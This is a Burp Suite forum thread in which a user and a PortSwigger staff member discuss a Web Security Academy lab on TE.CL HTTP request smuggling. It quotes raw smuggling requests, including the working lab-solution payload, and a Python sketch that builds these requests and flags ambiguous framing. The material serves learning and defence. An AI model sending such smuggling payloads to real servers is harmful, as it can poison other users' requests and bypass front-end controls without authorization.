Burp Suite User Forum


"Lab: HTTP request smuggling, basic TE.CL vulnerability" need help in understanding

Anton | Last updated: Feb 17, 2020 03:15PM UTC

Hello, I'm trying to figure out what is going on under the hood, but with no luck so far. Trying the following as a possible solution, I don't understand why the response is "Unrecognized method G0POST". Why is there a zero before "POST"?

Request:

    POST / HTTP/1.1
    Host: ac2f1f0e1ea3d02180733e8600de008b.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Transfer-Encoding: chunked
    Content-length: 3

    1
    G
    0

I appreciate any help. Thanks.

Hannah, PortSwigger Agent | Last updated: Feb 17, 2020 03:53PM UTC

Because your content-length is 3, that means that your first request stops after the "1". The following characters are prepended to the next post request. When the next request is sent, the G and 0 are prepended to the POST. This is why it will come up with G0POST. Have you had a look at the solution for the lab you are trying to complete? The TE.CL solution request looks significantly different to your request.

Anton | Last updated: Feb 17, 2020 04:15PM UTC

Yes, I solved the lab with the solution provided in the lab. I guess I see what is going on there. Please correct me if my understanding is wrong.

Request:

    ...
    Content-length: 4
    Transfer-Encoding: chunked

    5c
    GPOST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15

    x=1
    0

-----------------

Content-length: 4 - that means "5c\r\n"; the first request stops right after this blob.

GPOST / HTTP/1.1 - instead of prepending "G" to "POST" (which I was trying to achieve), it explicitly issues a GPOST request.

Does it sound right?

Hannah, PortSwigger Agent | Last updated: Feb 17, 2020 04:33PM UTC

Yes, that is correct.
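
The framing disagreement discussed in this thread, as an added Python sketch that is not part of the original posts or of the lab material: it parses the same bytes once by chunked encoding (front-end view) and once by Content-Length (back-end view) and returns what the back end leaves unread. The function names, the `lab.example` host and the no-trailers assumption are illustrative; `is_ambiguous` is the check a proxy or WAF rule would apply to reject such requests.

```python
# Added illustration, not from the thread. Requests are constructed samples;
# "lab.example" is a placeholder host.

def split_head(raw: bytes):
    """Return (lower-cased header dict, bytes after the blank line)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, rest

def chunked_end(body: bytes) -> int:
    """Offset just past the zero-size chunk (assumes no trailer fields)."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            return pos + 2                        # final CRLF
        pos += size + 2                           # chunk data + its CRLF

def te_cl_leftover(raw: bytes) -> bytes:
    """Body bytes a chunked front end forwards but a CL back end leaves unread."""
    headers, rest = split_head(raw)
    forwarded = rest[:chunked_end(rest)]
    return forwarded[int(headers[b"content-length"]):]

def is_ambiguous(raw: bytes) -> bool:
    """Defensive check: both framing headers present, so hops may disagree."""
    headers, _ = split_head(raw)
    return b"transfer-encoding" in headers and b"content-length" in headers

HEAD = (b"POST / HTTP/1.1\r\nHost: lab.example\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        b"Transfer-Encoding: chunked\r\nContent-Length: %d\r\n\r\n")

# First request in the thread: Content-Length 3, chunks "1/G" then "0".
FIRST = HEAD % 3 + b"1\r\nG\r\n0\r\n\r\n"

# Lab-solution shape from the thread: Content-Length 4 covers only "5c\r\n".
INNER = (b"GPOST / HTTP/1.1\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 15\r\n\r\nx=1")
SECOND = HEAD % 4 + b"%x\r\n" % len(INNER) + INNER + b"\r\n0\r\n\r\n"

if __name__ == "__main__":
    print(te_cl_leftover(FIRST))   # bytes left for the next request
    print(te_cl_leftover(SECOND))
```

The chunk size is computed from the inner request rather than hard-coded, which shows why the thread's `5c` (92 bytes) has to match the smuggled headers plus `x=1` exactly.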
